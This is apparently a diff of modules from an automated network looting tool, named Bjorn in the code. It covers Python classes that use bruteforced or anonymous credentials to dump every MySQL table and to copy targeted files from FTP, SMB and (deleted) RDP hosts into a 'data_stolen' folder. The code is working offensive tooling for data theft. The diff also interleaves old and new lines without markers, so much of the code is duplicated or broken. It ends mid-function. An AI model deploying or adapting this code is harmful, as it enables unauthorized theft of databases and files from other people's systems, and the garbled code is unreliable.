# -------- SQL helpers --------
def connect_sql(self, ip: str, username: str, password: str, database: Optional[str] = None):
try:
# If no database is specified, connect without one
db_part = f"/{database}" if database else ""
connection_str = f"mysql+pymysql://{username}:{password}@{ip}:3306{db_part}"
engine = create_engine(connection_str, connect_args={"connect_timeout": 10})
conn_str = f"mysql+pymysql://{username}:{password}@{ip}:{b_port}{db_part}"
engine = create_engine(conn_str, connect_args={"connect_timeout": 10})
# quick test
with engine.connect() as _:
pass
self.sql_connected = True
logger.info(f"Connected to {ip} via SQL with username {username}" + (f" to database {database}" if database else ""))
logger.info(f"Connected SQL {ip} as {username}" + (f" db={database}" if database else ""))
return engine
except Exception as e:
logger.error(f"SQL connection error for {ip} with user '{username}' and password '{password}'" + (f" to database {database}" if database else "") + f": {e}")
logger.error(f"SQL connect error {ip} {username}" + (f" db={database}" if database else "") + f": {e}")
return None
def find_tables(self, engine):
"""
Find all tables in all databases, excluding system databases.
Returns list of (table_name, schema_name) excluding system schemas.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("Table search interrupted due to orchestrator exit.")
logger.info("Table search interrupted.")
return []
query = """
q = text("""
SELECT TABLE_NAME, TABLE_SCHEMA
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_SCHEMA NOT IN ('information_schema', 'mysql', 'performance_schema', 'sys')
AND TABLE_TYPE = 'BASE TABLE'
"""
df = pd.read_sql(query, engine)
tables = df[['TABLE_NAME', 'TABLE_SCHEMA']].values.tolist()
logger.info(f"Found {len(tables)} tables across all databases")
return tables
WHERE TABLE_TYPE='BASE TABLE'
AND TABLE_SCHEMA NOT IN ('information_schema','mysql','performance_schema','sys')
""")
with engine.connect() as conn:
rows = conn.execute(q).fetchall()
return [(r[0], r[1]) for r in rows]
except Exception as e:
logger.error(f"Error finding tables: {e}")
logger.error(f"find_tables error: {e}")
return []
def steal_data(self, engine, table, schema, local_dir):
"""
Download data from the table in the database to a local file.
"""
def steal_data(self, engine, table: str, schema: str, local_dir: str) -> None:
try:
if self.shared_data.orchestrator_should_exit:
logger.info("Data stealing process interrupted due to orchestrator exit.")
logger.info("Data steal interrupted.")
return
query = f"SELECT * FROM {schema}.{table}"
df = pd.read_sql(query, engine)
local_file_path = os.path.join(local_dir, f"{schema}_{table}.csv")
df.to_csv(local_file_path, index=False)
logger.success(f"Downloaded data from table {schema}.{table} to {local_file_path}")
q = text(f"SELECT * FROM `{schema}`.`{table}`")
with engine.connect() as conn:
result = conn.execute(q)
headers = result.keys()
os.makedirs(local_dir, exist_ok=True)
out = os.path.join(local_dir, f"{schema}_{table}.csv")
with open(out, "w", newline="", encoding="utf-8") as f:
writer = csv.writer(f)
writer.writerow(headers)
for row in result:
writer.writerow(row)
logger.success(f"Dumped {schema}.{table} -> {out}")
except Exception as e:
logger.error(f"Error downloading data from table {schema}.{table}: {e}")
logger.error(f"Dump error {schema}.{table}: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal data from the remote SQL server.
"""
# -------- Orchestrator entry --------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
try:
if 'success' in row.get(self.b_parent_action, ''):
self.shared_data.bjornorch_status = "StealDataSQL"
time.sleep(5)
logger.info(f"Stealing data from {ip}:{port}...")
self.shared_data.bjorn_orch_status = b_class
try:
port_i = int(port)
except Exception:
port_i = b_port
sqlfile = self.shared_data.sqlfile
credentials = []
if os.path.exists(sqlfile):
df = pd.read_csv(sqlfile)
# Filter the credentials for this specific IP
ip_credentials = df[df['IP Address'] == ip]
# Build (username, password, database) tuples
credentials = [(row['User'], row['Password'], row['Database'])
for _, row in ip_credentials.iterrows()]
logger.info(f"Found {len(credentials)} credential combinations for {ip}")
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
creds = self._get_creds_for_target(ip, port_i)
logger.info(f"Found {len(creds)} SQL credentials in DB for {ip}")
if not creds:
logger.error(f"No SQL credentials for {ip}. Skipping.")
return 'failed'
def timeout():
def _timeout():
if not self.sql_connected:
logger.error(f"No SQL connection established within 4 minutes for {ip}. Marking as failed.")
logger.error(f"No SQL connection within 4 minutes for {ip}. Failing.")
self.stop_execution = True
timer = Timer(240, timeout)
timer = Timer(240, _timeout)
timer.start()
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
success = False
for username, password, database in credentials:
for username, password, _db in creds:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Steal data execution interrupted.")
logger.info("Execution interrupted.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip} on database {database}")
# Connect without a database first to check global permissions
engine = self.connect_sql(ip, username, password)
if engine:
tables = self.find_tables(engine)
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"sql/{mac}_{ip}/{database}")
os.makedirs(local_dir, exist_ok=True)
base_engine = self.connect_sql(ip, username, password, database=None)
if not base_engine:
continue
tables = self.find_tables(base_engine)
if not tables:
continue
if tables:
for table, schema in tables:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
# Connect to the specific database to steal its data
db_engine = self.connect_sql(ip, username, password, schema)
if db_engine:
db_engine = self.connect_sql(ip, username, password, database=schema)
if not db_engine:
continue
local_dir = os.path.join(self.shared_data.data_stolen_dir, f"sql/{mac}_{ip}/{schema}")
self.steal_data(db_engine, table, schema, local_dir)
success = True
counttables = len(tables)
logger.success(f"Successfully stolen data from {counttables} tables on {ip}:{port}")
if success:
logger.success(f"Stole data from {len(tables)} tables on {ip}")
success = True
timer.cancel()
return 'success'
except Exception as e:
logger.error(f"Error stealing data from {ip} with user '{username}' on database {database}: {e}")
logger.error(f"SQL loot error {ip} {username}: {e}")
if not success:
logger.error(f"Failed to steal any data from {ip}:{port}")
return 'failed'
else:
return 'success'
else:
logger.info(f"Skipping {ip} as it was not successfully bruteforced")
return 'skipped'
timer.cancel()
return 'success' if success else 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
def b_parent_action(self, row):
"""
Get the parent action status from the row.
"""
return row.get(b_parent, {}).get(b_status, '')
if __name__ == "__main__":
shared_data = SharedData()
try:
steal_data_sql = StealDataSQL(shared_data)
logger.info("[bold green]Starting SQL data extraction process[/bold green]")
# Load the IPs to process from shared data
ips_to_process = shared_data.read_data()
# Execute data theft on each IP
for row in ips_to_process:
ip = row["IPs"]
steal_data_sql.execute(ip, b_port, row, b_status)
except Exception as e:
logger.error(f"Error in main execution: {e}")

View File

@@ -1,198 +1,248 @@
"""
steal_files_ftp.py - This script connects to FTP servers using provided credentials or anonymous access, searches for specific files, and downloads them to a local directory.
steal_files_ftp.py — FTP file looter (DB-backed)
SQL mode:
- Orchestrator provides (ip, port) after parent success (FTPBruteforce).
- FTP credentials are read from DB.creds (service='ftp'); anonymous is also tried.
- IP -> (MAC, hostname) via DB.hosts.
- Loot saved under: {data_stolen_dir}/ftp/{mac}_{ip}/(anonymous|<username>)/...
"""
import os
import logging
import time
from rich.console import Console
from threading import Timer
from typing import List, Tuple, Dict, Optional
from ftplib import FTP
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_ftp.py", level=logging.DEBUG)
# Define the necessary global variables
# Action descriptors
b_class = "StealFilesFTP"
b_module = "steal_files_ftp"
b_status = "steal_files_ftp"
b_parent = "FTPBruteforce"
b_port = 21
class StealFilesFTP:
"""
Class to handle the process of stealing files from FTP servers.
"""
def __init__(self, shared_data):
try:
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.ftp_connected = False
self.stop_execution = False
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
logger.info("StealFilesFTP initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_ftp(self, ip, username, password):
# -------- Identity cache (hosts) --------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# -------- Credentials (creds table) --------
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str]]:
"""
Establish an FTP connection.
Return list[(user,password)] from DB.creds for this target.
Prefer exact IP; also include by MAC if known. Dedup preserves order.
"""
mac = self.mac_for_ip(ip)
params = {"ip": ip, "port": port, "mac": mac or ""}
by_ip = self.shared_data.db.query(
"""
SELECT "user","password"
FROM creds
WHERE service='ftp'
AND COALESCE(ip,'')=:ip
AND (port IS NULL OR port=:port)
""", params)
by_mac = []
if mac:
by_mac = self.shared_data.db.query(
"""
SELECT "user","password"
FROM creds
WHERE service='ftp'
AND COALESCE(mac_address,'')=:mac
AND (port IS NULL OR port=:port)
""", params)
seen, out = set(), []
for row in (by_ip + by_mac):
u = str(row.get("user") or "").strip()
p = str(row.get("password") or "").strip()
if not u or (u, p) in seen:
continue
seen.add((u, p))
out.append((u, p))
return out
# -------- FTP helpers --------
def connect_ftp(self, ip: str, username: str, password: str) -> Optional[FTP]:
try:
ftp = FTP()
ftp.connect(ip, 21)
ftp.connect(ip, b_port, timeout=10)
ftp.login(user=username, passwd=password)
self.ftp_connected = True
logger.info(f"Connected to {ip} via FTP with username {username}")
logger.info(f"Connected to {ip} via FTP as {username}")
return ftp
except Exception as e:
logger.error(f"FTP connection error for {ip} with user '{username}' and password '{password}': {e}")
logger.info(f"FTP connect failed {ip} {username}:{password}: {e}")
return None
def find_files(self, ftp, dir_path):
"""
Find files in the FTP share based on the configuration criteria.
"""
files = []
def find_files(self, ftp: FTP, dir_path: str) -> List[str]:
files: List[str] = []
try:
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
ftp.cwd(dir_path)
items = ftp.nlst()
for item in items:
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
try:
ftp.cwd(item)
ftp.cwd(item) # if ok -> directory
files.extend(self.find_files(ftp, os.path.join(dir_path, item)))
ftp.cwd('..')
except Exception:
if any(item.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in item for file_name in self.shared_data.steal_file_names):
# not a dir => file candidate
if any(item.endswith(ext) for ext in (self.shared_data.steal_file_extensions or [])) or \
any(name in item for name in (self.shared_data.steal_file_names or [])):
files.append(os.path.join(dir_path, item))
logger.info(f"Found {len(files)} matching files in {dir_path} on FTP")
except Exception as e:
logger.error(f"Error accessing path {dir_path} on FTP: {e}")
logger.error(f"FTP path error {dir_path}: {e}")
raise
return files
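# Hedged side note (not used above): where the FTP server supports the MLSD command
# (not all daemons do), ftplib can report entry types directly instead of the
# cwd-and-catch probe used in find_files(). Minimal sketch:
def walk_mlsd(ftp: FTP, path: str = "/"):
    """Yield candidate file paths recursively via MLSD facts (assumes server-side MLSD support)."""
    for name, facts in ftp.mlsd(path):
        if name in (".", ".."):
            continue
        full = path.rstrip("/") + "/" + name
        if facts.get("type") == "dir":
            yield from walk_mlsd(ftp, full)
        elif facts.get("type") == "file":
            yield full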
def steal_file(self, ftp, remote_file, local_dir):
"""
Download a file from the FTP server to the local directory.
"""
def steal_file(self, ftp: FTP, remote_file: str, base_dir: str) -> None:
try:
local_file_path = os.path.join(local_dir, os.path.relpath(remote_file, '/'))
local_file_dir = os.path.dirname(local_file_path)
os.makedirs(local_file_dir, exist_ok=True)
local_file_path = os.path.join(base_dir, os.path.relpath(remote_file, '/'))
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
with open(local_file_path, 'wb') as f:
ftp.retrbinary(f'RETR {remote_file}', f.write)
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
logger.success(f"Downloaded {remote_file} -> {local_file_path}")
except Exception as e:
logger.error(f"Error downloading file {remote_file} from FTP: {e}")
logger.error(f"FTP download error {remote_file}: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal files from the FTP server.
"""
# -------- Orchestrator entry --------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesFTP"
logger.info(f"Stealing files from {ip}:{port}...")
# Wait a bit because it's too fast to see the status change
time.sleep(5)
# Get FTP credentials from the cracked passwords file
ftpfile = self.shared_data.ftpfile
credentials = []
if os.path.exists(ftpfile):
with open(ftpfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4])) # Username and password
logger.info(f"Found {len(credentials)} credentials for {ip}")
def try_anonymous_access():
"""
Try to access the FTP server without credentials.
"""
self.shared_data.bjorn_orch_status = b_class
try:
ftp = self.connect_ftp(ip, 'anonymous', '')
return ftp
except Exception as e:
logger.info(f"Anonymous access to {ip} failed: {e}")
return None
port_i = int(port)
except Exception:
port_i = b_port
if not credentials and not try_anonymous_access():
logger.error(f"No valid credentials found for {ip}. Skipping...")
creds = self._get_creds_for_target(ip, port_i)
logger.info(f"Found {len(creds)} FTP credentials in DB for {ip}")
def try_anonymous() -> Optional[FTP]:
return self.connect_ftp(ip, 'anonymous', '')
if not creds and not try_anonymous():
logger.error(f"No FTP credentials for {ip}. Skipping.")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no FTP connection is established.
"""
def _timeout():
if not self.ftp_connected:
logger.error(f"No FTP connection established within 4 minutes for {ip}. Marking as failed.")
logger.error(f"No FTP connection within 4 minutes for {ip}. Failing.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer = Timer(240, _timeout)
timer.start()
# Attempt anonymous access first
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
success = False
ftp = try_anonymous_access()
if ftp:
remote_files = self.find_files(ftp, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"ftp/{mac}_{ip}/anonymous")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(ftp, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} via anonymous access")
ftp.quit()
if success:
timer.cancel() # Cancel the timer if the operation is successful
# Attempt to steal files using each credential if anonymous access fails
for username, password in credentials:
if self.stop_execution:
# Anonymous first
ftp = try_anonymous()
if ftp:
files = self.find_files(ftp, '/')
local_dir = os.path.join(self.shared_data.data_stolen_dir, f"ftp/{mac}_{ip}/anonymous")
if files:
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
self.steal_file(ftp, remote, local_dir)
logger.success(f"Stole {len(files)} files from {ip} via anonymous")
success = True
try:
ftp.quit()
except Exception:
pass
if success:
timer.cancel()
return 'success'
# Authenticated creds
for username, password in creds:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
logger.info(f"Trying FTP {username}:{password} @ {ip}")
ftp = self.connect_ftp(ip, username, password)
if ftp:
remote_files = self.find_files(ftp, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"ftp/{mac}_{ip}/{username}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
if not ftp:
continue
files = self.find_files(ftp, '/')
local_dir = os.path.join(self.shared_data.data_stolen_dir, f"ftp/{mac}_{ip}/{username}")
if files:
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
self.steal_file(ftp, remote_file, local_dir)
self.steal_file(ftp, remote, local_dir)
logger.info(f"Stole {len(files)} files from {ip} as {username}")
success = True
countfiles = len(remote_files)
logger.info(f"Successfully stolen {countfiles} files from {ip}:{port} with user '{username}'")
try:
ftp.quit()
except Exception:
pass
if success:
timer.cancel() # Cancel the timer if the operation is successful
break # Exit the loop as we have found valid credentials
except Exception as e:
logger.error(f"Error stealing files from {ip} with user '{username}': {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
timer.cancel()
return 'success'
except Exception as e:
logger.error(f"FTP loot error {ip} {username}: {e}")
timer.cancel()
return 'success' if success else 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_ftp = StealFilesFTP(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

View File

@@ -1,184 +0,0 @@
"""
steal_files_rdp.py - This script connects to remote RDP servers using provided credentials, searches for specific files, and downloads them to a local directory.
"""
import os
import subprocess
import logging
import time
from threading import Timer
from rich.console import Console
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_rdp.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesRDP"
b_module = "steal_files_rdp"
b_status = "steal_files_rdp"
b_parent = "RDPBruteforce"
b_port = 3389
class StealFilesRDP:
"""
Class to handle the process of stealing files from RDP servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.rdp_connected = False
self.stop_execution = False
logger.info("StealFilesRDP initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_rdp(self, ip, username, password):
"""
Establish an RDP connection.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("RDP connection attempt interrupted due to orchestrator exit.")
return None
command = f"xfreerdp /v:{ip} /u:{username} /p:{password} /drive:shared,/mnt/shared"
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode == 0:
logger.info(f"Connected to {ip} via RDP with username {username}")
self.rdp_connected = True
return process
else:
logger.error(f"Error connecting to RDP on {ip} with username {username}: {stderr.decode()}")
return None
except Exception as e:
logger.error(f"Error connecting to RDP on {ip} with username {username}: {e}")
return None
def find_files(self, client, dir_path):
"""
Find files in the remote directory based on the configuration criteria.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted due to orchestrator exit.")
return []
# Assuming that files are mounted and can be accessed via SMB or locally
files = []
for root, dirs, filenames in os.walk(dir_path):
for file in filenames:
if any(file.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file for file_name in self.shared_data.steal_file_names):
files.append(os.path.join(root, file))
logger.info(f"Found {len(files)} matching files in {dir_path}")
return files
except Exception as e:
logger.error(f"Error finding files in directory {dir_path}: {e}")
return []
def steal_file(self, remote_file, local_dir):
"""
Download a file from the remote server to the local directory.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
return
local_file_path = os.path.join(local_dir, os.path.basename(remote_file))
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
command = f"cp {remote_file} {local_file_path}"
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode == 0:
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
else:
logger.error(f"Error downloading file {remote_file}: {stderr.decode()}")
except Exception as e:
logger.error(f"Error stealing file {remote_file}: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal files from the remote server using RDP.
"""
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesRDP"
# Wait a bit because it's too fast to see the status change
time.sleep(5)
logger.info(f"Stealing files from {ip}:{port}...")
# Get RDP credentials from the cracked passwords file
rdpfile = self.shared_data.rdpfile
credentials = []
if os.path.exists(rdpfile):
with open(rdpfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4]))
logger.info(f"Found {len(credentials)} credentials for {ip}")
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no RDP connection is established.
"""
if not self.rdp_connected:
logger.error(f"No RDP connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt to steal files using each credential
success = False
for username, password in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Steal files execution interrupted due to orchestrator exit.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
client = self.connect_rdp(ip, username, password)
if client:
remote_files = self.find_files(client, '/mnt/shared')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"rdp/{mac}_{ip}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
break
self.steal_file(remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} using {username}")
client.terminate()
if success:
timer.cancel() # Cancel the timer if the operation is successful
return 'success' # Return success if the operation is successful
except Exception as e:
logger.error(f"Error stealing files from {ip} with username {username}: {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
return 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_rdp = StealFilesRDP(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

View File

@@ -1,223 +1,252 @@
"""
steal_files_smb.py — SMB file looter (DB-backed).
SQL mode:
- Orchestrator provides (ip, port) after parent success (SMBBruteforce).
- DB.creds (service='smb') provides credentials; 'database' column stores share name.
- Also try anonymous (''/'').
- Output under: {data_stolen_dir}/smb/{mac}_{ip}/{share}/...
"""
import os
import logging
from rich.console import Console
from threading import Timer
import time
from threading import Timer
from typing import List, Tuple, Dict, Optional
from smb.SMBConnection import SMBConnection
from smb.base import SharedFile
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_smb.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesSMB"
b_module = "steal_files_smb"
b_status = "steal_files_smb"
b_parent = "SMBBruteforce"
b_port = 445
IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$', 'Sharename', '---------', 'SMB1'}
class StealFilesSMB:
"""
Class to handle the process of stealing files from SMB shares.
"""
def __init__(self, shared_data):
try:
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.smb_connected = False
self.stop_execution = False
self.IGNORED_SHARES = set(self.shared_data.ignored_smb_shares or [])
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
logger.info("StealFilesSMB initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_smb(self, ip, username, password):
# -------- Identity cache --------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# -------- Creds (grouped by share) --------
def _get_creds_by_share(self, ip: str, port: int) -> Dict[str, List[Tuple[str, str]]]:
"""
Establish an SMB connection.
Returns {share: [(user,pass), ...]} from DB.creds (service='smb', database=share).
Prefer IP; also include MAC if known. Dedup per share.
"""
mac = self.mac_for_ip(ip)
params = {"ip": ip, "port": port, "mac": mac or ""}
by_ip = self.shared_data.db.query(
"""
SELECT "user","password","database"
FROM creds
WHERE service='smb'
AND COALESCE(ip,'')=:ip
AND (port IS NULL OR port=:port)
""", params)
by_mac = []
if mac:
by_mac = self.shared_data.db.query(
"""
SELECT "user","password","database"
FROM creds
WHERE service='smb'
AND COALESCE(mac_address,'')=:mac
AND (port IS NULL OR port=:port)
""", params)
out: Dict[str, List[Tuple[str, str]]] = {}
seen: Dict[str, set] = {}
for row in (by_ip + by_mac):
share = str(row.get("database") or "").strip()
user = str(row.get("user") or "").strip()
pwd = str(row.get("password") or "").strip()
if not user or not share:
continue
if share not in out:
out[share], seen[share] = [], set()
if (user, pwd) in seen[share]:
continue
seen[share].add((user, pwd))
out[share].append((user, pwd))
return out
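# Illustrative shape of the mapping returned above (share names and credentials are
# hypothetical):
#   {
#       "Public":  [("alice", "alice123")],
#       "Backups": [("admin", "admin"), ("svc_backup", "Winter2024!")],
#   }
# The caller can then work share by share, trying each (user, password) pair in order.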
# -------- SMB helpers --------
def connect_smb(self, ip: str, username: str, password: str) -> Optional[SMBConnection]:
try:
conn = SMBConnection(username, password, "Bjorn", "Target", use_ntlm_v2=True, is_direct_tcp=True)
conn.connect(ip, 445)
logger.info(f"Connected to {ip} via SMB with username {username}")
conn.connect(ip, b_port)
self.smb_connected = True
logger.info(f"Connected SMB {ip} as {username}")
return conn
except Exception as e:
logger.error(f"SMB connection error for {ip} with user '{username}' and password '{password}': {e}")
logger.error(f"SMB connect error {ip} {username}: {e}")
return None
def find_files(self, conn, share_name, dir_path):
"""
Find files in the SMB share based on the configuration criteria.
"""
files = []
try:
for file in conn.listPath(share_name, dir_path):
if file.isDirectory:
if file.filename not in ['.', '..']:
files.extend(self.find_files(conn, share_name, os.path.join(dir_path, file.filename)))
else:
if any(file.filename.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file.filename for file_name in self.shared_data.steal_file_names):
files.append(os.path.join(dir_path, file.filename))
logger.info(f"Found {len(files)} matching files in {dir_path} on share {share_name}")
except Exception as e:
logger.error(f"Error accessing path {dir_path} in share {share_name}: {e}")
return files
def steal_file(self, conn, share_name, remote_file, local_dir):
"""
Download a file from the SMB share to the local directory.
"""
try:
local_file_path = os.path.join(local_dir, os.path.relpath(remote_file, '/'))
local_file_dir = os.path.dirname(local_file_path)
os.makedirs(local_file_dir, exist_ok=True)
with open(local_file_path, 'wb') as f:
conn.retrieveFile(share_name, remote_file, f)
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
except Exception as e:
logger.error(f"Error downloading file {remote_file} from share {share_name}: {e}")
    def list_shares(self, conn: SMBConnection):
        """
        List shares using the SMBConnection object.
        """
        try:
            shares = conn.listShares()
            return [s for s in shares if (s.name not in self.IGNORED_SHARES and not s.isSpecial and not s.isTemporary)]
        except Exception as e:
            logger.error(f"list_shares error: {e}")
            return []

    def find_files(self, conn: SMBConnection, share: str, dir_path: str) -> List[str]:
        files: List[str] = []
        try:
            for entry in conn.listPath(share, dir_path):
                if self.shared_data.orchestrator_should_exit or self.stop_execution:
                    logger.info("File search interrupted.")
                    return []
                if entry.isDirectory:
                    if entry.filename not in ('.', '..'):
                        files.extend(self.find_files(conn, share, os.path.join(dir_path, entry.filename)))
                else:
                    name = entry.filename
                    if any(name.endswith(ext) for ext in (self.shared_data.steal_file_extensions or [])) or \
                       any(sn in name for sn in (self.shared_data.steal_file_names or [])):
                        files.append(os.path.join(dir_path, name))
            return files
        except Exception as e:
            logger.error(f"SMB path error {share}:{dir_path}: {e}")
            raise

    def steal_file(self, conn: SMBConnection, share: str, remote_file: str, base_dir: str) -> None:
        try:
            local_file_path = os.path.join(base_dir, os.path.relpath(remote_file, '/'))
            os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
            with open(local_file_path, 'wb') as f:
                conn.retrieveFile(share, remote_file, f)
            logger.success(f"Downloaded {share}:{remote_file} -> {local_file_path}")
        except Exception as e:
            logger.error(f"SMB download error {share}:{remote_file}: {e}")

    # -------- Orchestrator entry --------
    def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
        try:
            self.shared_data.bjorn_orch_status = b_class
            logger.info(f"Stealing files from {ip}:{port}...")
            try:
                port_i = int(port)
            except Exception:
                port_i = b_port

            creds_by_share = self._get_creds_by_share(ip, port_i)
            logger.info(f"Found SMB creds for {len(creds_by_share)} share(s) in DB for {ip}")

            def _timeout():
                if not self.smb_connected:
                    logger.error(f"No SMB connection within 4 minutes for {ip}. Failing.")
                    self.stop_execution = True

            timer = Timer(240, _timeout)
            timer.start()

            mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
            success = False

            # Anonymous first (''/'')
            try:
                conn = self.connect_smb(ip, '', '')
                if conn:
                    shares = self.list_shares(conn)
                    for s in shares:
                        files = self.find_files(conn, s.name, '/')
                        if files:
                            base = os.path.join(self.shared_data.data_stolen_dir, f"smb/{mac}_{ip}/{s.name}")
                            for remote in files:
